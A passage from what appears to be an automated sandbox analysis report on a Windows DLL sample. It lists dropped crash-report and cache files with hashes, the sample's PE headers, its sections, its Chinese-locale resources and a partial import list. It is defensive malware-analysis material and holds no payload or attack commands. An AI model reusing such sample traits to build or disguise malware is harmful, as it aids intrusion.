                                                                                                        Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.1.2.8.<./.P.i.d.>.......
                                                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WER37B8.tmp.csv
                                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):54294
                                                                                                        Entropy (8bit):3.065453431295334
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:768:NZHDXSE66uT4rWXV/ZKGzWZXf+tJYRzdvs1sj+nKztt4o:NZHDXruT4rWX1ZKGz2Pz3s1sjmYtt3
                                                                                                        MD5:9349FAC214CA4C81AB05C77F4A2C7D4D
                                                                                                        SHA1:3AAEB9C25AF62BDCC9495E193D9352D5A98454DE
                                                                                                        SHA-256:A5673DCE88CE81C3441A2D16BF605813E6F99D24354F81F24CC9C333E15133CE
                                                                                                        SHA-512:119E25AF4398FEABC300138E337B697DC9AF0DD61D2D9DA2139F227C2C366D35C785896C4C47027421DCB949377989B61AD3BFCBBA1200877C9E91F158D6A81C
                                                                                                        Malicious:false
                                                                                                        Preview: I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.
                                                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WER380F.tmp.xml
                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):4598
                                                                                                        Entropy (8bit):4.472230205116493
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:48:cvIwSD8zs3JgtWI9i8WSC8B5T8fm8M4J2+SZFriK+q84pz/KcQIcQw0Fd:uITfZJ1SN4JQaKx/Kkw0Fd
                                                                                                        MD5:AD542CDFC04F3D3E21C591306272E1F2
                                                                                                        SHA1:75DCC0382297711450AA500834D42ABD25E00A84
                                                                                                        SHA-256:94CE388EDFAABD0604FF750318ED3358F74120AD6B82D85BADD173DF09C9CC32
                                                                                                        SHA-512:BA14E776E54168A2FE6CB337B251455021408E7D28A199E9E04FB2349C858E3DFBFE7F37486CD15415AB0552DE2631CF09FC813AF9D43E440CCAEFCABDB8472E
                                                                                                        Malicious:false
                                                                                                        Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1342261" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WER40B2.tmp.txt
                                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):13340
                                                                                                        Entropy (8bit):2.694612449693779
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:96:9GiZYWvXIp9YRYVLHW2zH3UYEZCftFiSP3DG5wCEBFZUahVHixcZzQIaD3:9jZDk2oDDUSUahVHicZznaD3
                                                                                                        MD5:5F5477C2598625553616383B8D034BF9
                                                                                                        SHA1:93356F37C9678412A30B9CDFEE671FFC31D10926
                                                                                                        SHA-256:E34358D64E33055A271962E7C83522C5557B2420100ADFAF553438CCE8DFAB6D
                                                                                                        SHA-512:57FAFBBDE767CE5B3C0691E6F3802C93986B87710A0A12B23A429D9DE94A8242705779133007B198DA2FDFFE7CCE866E31D0F1CD2E91F57ED4966105BB874BA8
                                                                                                        Malicious:false
                                                                                                        Preview: B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.1.5.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .
                                                                                                        C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
                                                                                                        Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                        File Type:Microsoft Cabinet archive data, 61414 bytes, 1 file
                                                                                                        Category:dropped
                                                                                                        Size (bytes):61414
                                                                                                        Entropy (8bit):7.995245868798237
                                                                                                        Encrypted:true
                                                                                                        SSDEEP:1536:EysgU6qmzixT64jYMZ8HbVPGfVDwm/xLZ9rP:wF6qmeo4eH1m9wmLvrP
                                                                                                        MD5:ACAEDA60C79C6BCAC925EEB3653F45E0
                                                                                                        SHA1:2AAAE490BCDACCC6172240FF1697753B37AC5578
                                                                                                        SHA-256:6B0CECCF0103AFD89844761417C1D23ACC41F8AEBF3B7230765209B61EEE5658
                                                                                                        SHA-512:FEAA6E7ED7DDA1583739B3E531AB5C562A222EE6ECD042690AE7DCFF966717C6E968469A7797265A11F6E899479AE0F3031E8CF5BEBE1492D5205E9C59690900
                                                                                                        Malicious:false
                                                                                                        Preview: MSCF............,...................I.......;w........RSNj .authroot.stl..>.(.5..CK..8T....c_.d...A.K...+.d.H..*i.RJJ.IQIR..$t)Kd.-[..T\{..ne......<.w......A..B........c...wi......D....c.0D,L........fy....Rg...=........i,3.3..Z....~^ve<...TF.*...f.zy.,...m.@.0.0...m.3..I(..+..v#...(.2....e...L..*y..V.......~U...."<ke.....l.X:Dt..R<7.5\A7L0=..T.V...IDr..8<....r&...I-.^..b.b.".Af....E.._..r.>.`;,.Hob..S.....7'..\.R$.".g..+..64..@nP.....k3...B.`.G..@D.....L.....`^...#OpW.....!....`.....rf:.}.R.@....gR.#7....l..H.#...d.Qh..3..fCX....==#..M.l..~&....[.J9.\..Ww.....Tx.%....]..a4E...q.+...#.*a..x..O..V.t..Y1!.T..`U...-...< _@...|(.....0..3.`.LU...E0.Gu.4KN....5...?.....I.p..'..........N<.d.O..dH@c1t...[w/...T....cYK.X>.0..Z.....O>..9.3.#9X.%.b...5.YK.E.V.....`./.3.._..nN]..=..M.o.F.._..z....._...gY..!Z..?l....vp.l.:.d.Z..W.....~...N.._.k...&.....$......i.F.d.....D!e.....Y..,.E..m.;.1... $.F..O.F.o_}.uG....,.%.>,.Zx.......o....c../.;....g&.....
                                                                                                        C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
                                                                                                        Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                        File Type:data
                                                                                                        Category:modified
                                                                                                        Size (bytes):328
                                                                                                        Entropy (8bit):3.097530992147587
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:6:kKa0k8SN+SkQlPlEGYRMY9z+4KlDA3RUeYlUmlUR/t:f9kPlE99SNxAhUeYlUSA/t
                                                                                                        MD5:FE852652A83C35ED73C16EB984F0A0BB
                                                                                                        SHA1:903E0D354606447141921F368FFF881F8B39D314
                                                                                                        SHA-256:544F8EC2994A6E7AE27B6E6716551CED5B9DA560112E0983051DD85BD10A38D3
                                                                                                        SHA-512:262D92433CCBCF768B271A5CD0E0FEA9FFD91773D8BEECE487C9BC110661D0FF92BFDF59C9934F83B897A65B11E885A63361AD24CE9F94C86F7592643C7D946A
                                                                                                        Malicious:false
                                                                                                        Preview: p...... ........d.Eo...(....................................................... ........q.\].......&...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".0.7.1.e.1.5.c.5.d.c.4.d.7.1.:.0."...
                                                                                                        C:\Windows\appcompat\Programs\Amcache.hve
                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                        File Type:MS Windows registry file, NT/2000 or above
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1572864
                                                                                                        Entropy (8bit):4.2353877146837755
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:12288:AXebQWU7wCwgLXGMpf9a2sYrwl8X6ixnD72RGDQfK+kGVZWa:cebQWU7wCwYXGMmuw
                                                                                                        MD5:A0557199ADDFB27CF6464B5654E5A8D2
                                                                                                        SHA1:A1E5B548CF78A926C58CF4F8896D6F5AF36EA689
                                                                                                        SHA-256:57BEABDE5C4A76F562D6BC875F323212DD287C45BB05BAE5B1EAD7E60A1B3A7C
                                                                                                        SHA-512:06DB0E8FA45D8FD906539407ABEC8DE47B01D10FE91FD379BDE0E8ED0242299888405E4ACA66B0856C90EF95559C50B9A8C83B0B347B7F8BDC7D35321F57D5BB
                                                                                                        Malicious:false
                                                                                                        Preview: regfH...H...p.\..,.................. ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e...4............E.4............E.....5............E.rmtmZ^.=o...............................................................................................................................................................................................................................................................................................................................................u..`........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                        C:\Windows\appcompat\Programs\Amcache.hve.LOG1
                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                        File Type:MS Windows registry file, NT/2000 or above
                                                                                                        Category:dropped
                                                                                                        Size (bytes):16384
                                                                                                        Entropy (8bit):3.717963317220201
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:384:bou5K5Rcv4KgnVVeeDzeu1NKZtjWT8GRFwlnz:UgKCg/eeDzeANYtjzGRFwl
                                                                                                        MD5:6F59FBDE4F71430F9292DA90FE383B99
                                                                                                        SHA1:4726D40666BF4E921633D743DC6763542696A4EC
                                                                                                        SHA-256:BCBC1BEB1BA771B7C4B1C28484C56FACB5D44B9AE7F92AD4585349840177A5B8
                                                                                                        SHA-512:2709BD600E9FBAEF8069E1197E29A79AB36F18BA3DAFA11849C9B0CA81EA0B45C4B46E8D896F195207EEC23FFA9D4AD04D03DA4316ED61DE0AA5DDED6E07F9AB
                                                                                                        Malicious:false
                                                                                                        Preview: regfG...G...p.\..,.................. ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e...4............E.4............E.....5............E.rmtmZ^.=o...............................................................................................................................................................................................................................................................................................................................................s..`HvLE.>......G............-'_....2....J..........................hbin................p.\..,..........nk,....=o................................... ...........................&...{ad79c032-a2ea-f756-e377-72fb9332c3ae}......nk ....=o....... ........................... .......Z.......................Root........lf......Root....nk ....=o................................... ...............*...............DeviceCensus.......................vk..................WritePermissionsCheck.......p...

                                                                                                        Static File Info

                                                                                                        General

                                                                                                        File type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                        Entropy (8bit):6.767601853206896
                                                                                                        TrID:
                                                                                                        • Win32 Dynamic Link Library (generic) (1002004/3) 98.32%
                                                                                                        • Windows Screen Saver (13104/52) 1.29%
                                                                                                        • Generic Win/DOS Executable (2004/3) 0.20%
                                                                                                        • DOS Executable Generic (2002/1) 0.20%
                                                                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                        File name:nV5Wu77N8J.dll
                                                                                                        File size:588288
                                                                                                        MD5:a0306b7a6a12022e4fc8e586b0bc90ec
                                                                                                        SHA1:ee7d221826a725a2110bbddbea34bd14522b5ab4
                                                                                                        SHA256:9b1ca060b5a969f03c4c8d99ad487a454742e47fff97343a90afacb5da7d9589
                                                                                                        SHA512:9bf807e5b79ec4d6c24db9106db43d6e4e2211d70caf8ca71101d96001a7fb6c31dad9ac4d72b8e6646e03a7bfa70b296968be6a24f3d11dd8e90090de94d7dc
                                                                                                        SSDEEP:6144:cNU5LwA22222GgngDrDRVyYli/ci2tEGW78ODQiE3tvOSk5DKXOW14IkFxVFgY4E:x5w7YM/cYVV7EsOpOJyvnHtytFyQ
                                                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m.......................................^F......^P.n....^W.t....^Y......^A......^G......^B.....Rich....................PE..L..

                                                                                                        File Icon

                                                                                                        Icon Hash:71b018ccc6577131

                                                                                                        Static PE Info

                                                                                                        General

                                                                                                        Entrypoint:0x1002eaac
                                                                                                        Entrypoint Section:.text
                                                                                                        Digitally signed:false
                                                                                                        Imagebase:0x10000000
                                                                                                        Subsystem:windows gui
                                                                                                        Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                                                                                                        DLL Characteristics:
                                                                                                        Time Stamp:0x61E03DE6 [Thu Jan 13 14:57:42 2022 UTC]
                                                                                                        TLS Callbacks:
                                                                                                        CLR (.Net) Version:
                                                                                                        OS Version Major:5
                                                                                                        OS Version Minor:0
                                                                                                        File Version Major:5
                                                                                                        File Version Minor:0
                                                                                                        Subsystem Version Major:5
                                                                                                        Subsystem Version Minor:0
                                                                                                        Import Hash:7f57698bb210fa88a6b01b1feaf20957

                                                                                                        Entrypoint Preview

                                                                                                        Instruction
                                                                                                        mov edi, edi
                                                                                                        push ebp
                                                                                                        mov ebp, esp
                                                                                                        cmp dword ptr [ebp+0Ch], 01h
                                                                                                        jne 00007F3750B90317h
                                                                                                        call 00007F3750B98B88h
                                                                                                        push dword ptr [ebp+08h]
                                                                                                        mov ecx, dword ptr [ebp+10h]
                                                                                                        mov edx, dword ptr [ebp+0Ch]
                                                                                                        call 00007F3750B90201h
                                                                                                        pop ecx
                                                                                                        pop ebp
                                                                                                        retn 000Ch
                                                                                                        mov edi, edi
                                                                                                        push ebp
                                                                                                        mov ebp, esp
                                                                                                        push esi
                                                                                                        push edi
                                                                                                        mov edi, dword ptr [ebp+10h]
                                                                                                        mov eax, edi
                                                                                                        sub eax, 00000000h
                                                                                                        je 00007F3750B918FBh
                                                                                                        dec eax
                                                                                                        je 00007F3750B918E3h
                                                                                                        dec eax
                                                                                                        je 00007F3750B918AEh
                                                                                                        dec eax
                                                                                                        je 00007F3750B9185Fh
                                                                                                        dec eax
                                                                                                        je 00007F3750B917CFh
                                                                                                        mov ecx, dword ptr [ebp+0Ch]
                                                                                                        mov eax, dword ptr [ebp+08h]
                                                                                                        push ebx
                                                                                                        push 00000020h
                                                                                                        pop edx
                                                                                                        jmp 00007F3750B90787h
                                                                                                        mov esi, dword ptr [eax]
                                                                                                        cmp esi, dword ptr [ecx]
                                                                                                        je 00007F3750B9038Eh
                                                                                                        movzx esi, byte ptr [eax]
                                                                                                        movzx ebx, byte ptr [ecx]
                                                                                                        sub esi, ebx
                                                                                                        je 00007F3750B90327h
                                                                                                        xor ebx, ebx
                                                                                                        test esi, esi
                                                                                                        setnle bl
                                                                                                        lea ebx, dword ptr [ebx+ebx-01h]
                                                                                                        mov esi, ebx
                                                                                                        test esi, esi
                                                                                                        jne 00007F3750B9077Fh
                                                                                                        movzx esi, byte ptr [eax+01h]
                                                                                                        movzx ebx, byte ptr [ecx+01h]
                                                                                                        sub esi, ebx
                                                                                                        je 00007F3750B90327h
                                                                                                        xor ebx, ebx
                                                                                                        test esi, esi
                                                                                                        setnle bl
                                                                                                        lea ebx, dword ptr [ebx+ebx-01h]
                                                                                                        mov esi, ebx
                                                                                                        test esi, esi
                                                                                                        jne 00007F3750B9075Eh
                                                                                                        movzx esi, byte ptr [eax+02h]
                                                                                                        movzx ebx, byte ptr [ecx+02h]
                                                                                                        sub esi, ebx
                                                                                                        je 00007F3750B90327h
                                                                                                        xor ebx, ebx
                                                                                                        test esi, esi
                                                                                                        setnle bl
                                                                                                        lea ebx, dword ptr [ebx+ebx-01h]
                                                                                                        mov esi, ebx
                                                                                                        test esi, esi
                                                                                                        jne 00007F3750B9073Dh

                                                                                                        Rich Headers

                                                                                                        Programming Language:
                                                                                                        • [ C ] VS2008 build 21022
                                                                                                        • [LNK] VS2008 build 21022
                                                                                                        • [ C ] VS2005 build 50727
                                                                                                        • [ASM] VS2008 build 21022
                                                                                                        • [IMP] VS2005 build 50727
                                                                                                        • [RES] VS2008 build 21022
                                                                                                        • [EXP] VS2008 build 21022
                                                                                                        • [C++] VS2008 build 21022

                                                                                                        Data Directories

                                                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x50bc00x50.rdata
                                                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x4f5380xb4.rdata
                                                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x890000x3410.rsrc
                                                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x8d0000x415c.reloc
                                                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x4bd000x40.rdata
                                                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x470000x454.rdata
                                                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x4f4b00x40.rdata
                                                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                        Sections

                                                                                                        NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                        .text0x10000x45bb90x45c00False0.379756804435data6.37093799262IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                                        .rdata0x470000x9c100x9e00False0.357397151899data5.22192082052IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                        .data0x510000x3735c0x33800False0.741035535498data6.11335979295IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                        .rsrc0x890000x34100x3600False0.306640625data4.34913645958IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                        .reloc0x8d0000x8c340x8e00False0.346308318662data4.00973830682IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                        Resources

                                                                                                        NameRVASizeTypeLanguageCountry
                                                                                                        RT_CURSOR0x89ac00x134dataChineseChina
                                                                                                        RT_CURSOR0x89bf40xb4dataChineseChina
                                                                                                        RT_CURSOR0x89ca80x134AmigaOS bitmap fontChineseChina
                                                                                                        RT_CURSOR0x89ddc0x134dataChineseChina
                                                                                                        RT_CURSOR0x89f100x134dataChineseChina
                                                                                                        RT_CURSOR0x8a0440x134dataChineseChina
                                                                                                        RT_CURSOR0x8a1780x134dataChineseChina
                                                                                                        RT_CURSOR0x8a2ac0x134dataChineseChina
                                                                                                        RT_CURSOR0x8a3e00x134dataChineseChina
                                                                                                        RT_CURSOR0x8a5140x134dataChineseChina
                                                                                                        RT_CURSOR0x8a6480x134dataChineseChina
                                                                                                        RT_CURSOR0x8a77c0x134dataChineseChina
                                                                                                        RT_CURSOR0x8a8b00x134AmigaOS bitmap fontChineseChina
                                                                                                        RT_CURSOR0x8a9e40x134dataChineseChina
                                                                                                        RT_CURSOR0x8ab180x134dataChineseChina
                                                                                                        RT_CURSOR0x8ac4c0x134dataChineseChina
                                                                                                        RT_BITMAP0x8ad800xb8dataChineseChina
                                                                                                        RT_BITMAP0x8ae380x144dataChineseChina
                                                                                                        RT_ICON0x8af7c0x2e8dBase IV DBT of @.DBF, block length 512, next free block index 40, next free block 67108992, next used block 3293332676ChineseChina
                                                                                                        RT_ICON0x8b2640x128GLS_BINARY_LSB_FIRSTChineseChina
                                                                                                        RT_DIALOG0x8b38c0x33cdataChineseChina
                                                                                                        RT_DIALOG0x8b6c80xe2dataChineseChina
                                                                                                        RT_DIALOG0x8b7ac0x34dataChineseChina
                                                                                                        RT_STRING0x8b7e00x4edataChineseChina
                                                                                                        RT_STRING0x8b8300x2cdataChineseChina
                                                                                                        RT_STRING0x8b85c0x82dataChineseChina
                                                                                                        RT_STRING0x8b8e00x1d6dataChineseChina
                                                                                                        RT_STRING0x8bab80x160dataChineseChina
                                                                                                        RT_STRING0x8bc180x12edataChineseChina
                                                                                                        RT_STRING0x8bd480x50dataChineseChina
                                                                                                        RT_STRING0x8bd980x44dataChineseChina
                                                                                                        RT_STRING0x8bddc0x68dataChineseChina
                                                                                                        RT_STRING0x8be440x1b8dataChineseChina
                                                                                                        RT_STRING0x8bffc0x104dataChineseChina
                                                                                                        RT_STRING0x8c1000x24dataChineseChina
                                                                                                        RT_STRING0x8c1240x30dataChineseChina
                                                                                                        RT_GROUP_CURSOR0x8c1540x22Lotus unknown worksheet or configuration, revision 0x2ChineseChina
                                                                                                        RT_GROUP_CURSOR0x8c1780x14Lotus unknown worksheet or configuration, revision 0x1ChineseChina
                                                                                                        RT_GROUP_CURSOR0x8c18c0x14Lotus unknown worksheet or configuration, revision 0x1ChineseChina
                                                                                                        RT_GROUP_CURSOR0x8c1a00x14Lotus unknown worksheet or configuration, revision 0x1ChineseChina
                                                                                                        RT_GROUP_CURSOR0x8c1b40x14Lotus unknown worksheet or configuration, revision 0x1ChineseChina
                                                                                                        RT_GROUP_CURSOR0x8c1c80x14Lotus unknown worksheet or configuration, revision 0x1ChineseChina
                                                                                                        RT_GROUP_CURSOR0x8c1dc0x14Lotus unknown worksheet or configuration, revision 0x1ChineseChina
                                                                                                        RT_GROUP_CURSOR0x8c1f00x14Lotus unknown worksheet or configuration, revision 0x1ChineseChina
                                                                                                        RT_GROUP_CURSOR0x8c2040x14Lotus unknown worksheet or configuration, revision 0x1ChineseChina
                                                                                                        RT_GROUP_CURSOR0x8c2180x14Lotus unknown worksheet or configuration, revision 0x1ChineseChina
                                                                                                        RT_GROUP_CURSOR0x8c22c0x14Lotus unknown worksheet or configuration, revision 0x1ChineseChina
                                                                                                        RT_GROUP_CURSOR0x8c2400x14Lotus unknown worksheet or configuration, revision 0x1ChineseChina
                                                                                                        RT_GROUP_CURSOR0x8c2540x14Lotus unknown worksheet or configuration, revision 0x1ChineseChina
                                                                                                        RT_GROUP_CURSOR0x8c2680x14Lotus unknown worksheet or configuration, revision 0x1ChineseChina
                                                                                                        RT_GROUP_CURSOR0x8c27c0x14Lotus unknown worksheet or configuration, revision 0x1ChineseChina
                                                                                                        RT_GROUP_ICON0x8c2900x22dataChineseChina
                                                                                                        RT_MANIFEST0x8c2b40x15aASCII text, with CRLF line terminatorsEnglishUnited States

                                                                                                        Imports

                                                                                                        DLLImport
                                                                                                        KERNEL32.dllGetOEMCP, GetCommandLineA, RtlUnwind, ExitProcess, HeapReAlloc, RaiseException, HeapSize, TerminateProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, GetACP, IsValidCodePage, LCMapStringA, LCMapStringW, HeapCreate, HeapDestroy, GetStdHandle, GetCPInfo, GetFileType, GetStartupInfoA, FreeEnvironmentStringsA, GetEnvironmentStrings, FreeEnvironmentStringsW, GetEnvironmentStringsW, QueryPerformanceCounter, GetTickCount, GetSystemTimeAsFileTime, InitializeCriticalSectionAndSpinCount, GetConsoleCP, GetConsoleMode, GetStringTypeA, GetStringTypeW, GetUserDefaultLCID, EnumSystemLocalesA, IsValidLocale, GetLocaleInfoW, SetStdHandle, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW, GetModuleHandleW, CreateFileA, GetCurrentProcess, FlushFileBuffers, SetFilePointer, WriteFile, ReadFile, InterlockedIncrement, TlsFree, LocalReAlloc, TlsSetValue, TlsAlloc, GlobalHandle, GlobalReAlloc, TlsGetValue, LocalAlloc, WritePrivateProfileStringA, GlobalFlags, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSection, GlobalGetAtomNameA, GlobalFindAtomA, lstrcmpW, GetVersionExA, FormatMessageA, LocalFree, lstrlenA, InterlockedDecrement, MulDiv, MultiByteToWideChar, GlobalUnlock, GlobalFree, FreeResource, GlobalAddAtomA, GetCurrentProcessId, GetLastError, GlobalDeleteAtom, GetCurrentThread, GetCurrentThreadId, ConvertDefaultLocale, EnumResourceLanguagesA, GetModuleFileNameA, GetLocaleInfoA, WideCharToMultiByte, CompareStringA, FindResourceA, LoadResource, LockResource, 